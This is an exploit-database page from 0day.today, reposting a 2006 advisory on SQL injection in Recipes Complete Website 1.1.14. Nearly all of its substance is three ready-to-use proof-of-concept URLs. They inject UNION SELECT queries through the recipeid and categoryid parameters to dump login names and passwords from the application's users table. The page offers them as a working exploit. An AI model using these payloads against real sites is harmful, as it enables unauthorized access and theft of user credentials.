[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Recipes Complete Website 1.1.14 Remote SQL Injection Vulnerabilities

Author
GregStar
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1198
Category
web applications
Date add
23-11-2006
Platform
unsorted
====================================================================
Recipes Complete Website 1.1.14 Remote SQL Injection Vulnerabilities
====================================================================



*************************************************************************************************************************#
                                                              					          		 #
			               			 Coding 4 Fun     						 #	
			                                      						  		 #
*************************************************************************************************************************#
													  		 #
* Recipes Complete Website 1.1.14                                                                                     	 #
													  		 #	
* Class = SQL Injection ;										  		 #
													  		 #
* Found by = GregStar (gregstar[at]c4f[dot]pl) (http://c4f.pl) ;				          		 #
												  	  		 #
-------------------------------------------------------------------------------------------------------------------------#
													  		 #
													  		 #
- PoC:												          		 #
													  		 #
http://[target]/[path]/recipe.php?recipeid=-1%20UNION%20SELECT%20login,password,0,0,0,0%20FROM%20users%20/* 		 #
															 #
-------------------------------------------------------------------------------------------------------------------------#
http://[target]/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,login,0,0%20FROM%20users%20/*  - login      #											  
													  		 #
-------------------------------------------------------------------------------------------------------------------------#
http://[target]/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,password,0,0%20FROM%20users%20/* - password #
															 #
*************************************************************************************************************************#													  				
Gr33tz:  sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,rfl,d3m0n,java,reyw,kw@ch.	  		 #												          		 #
*************************************************************************************************************************#




#  0day.today [2024-12-25]  #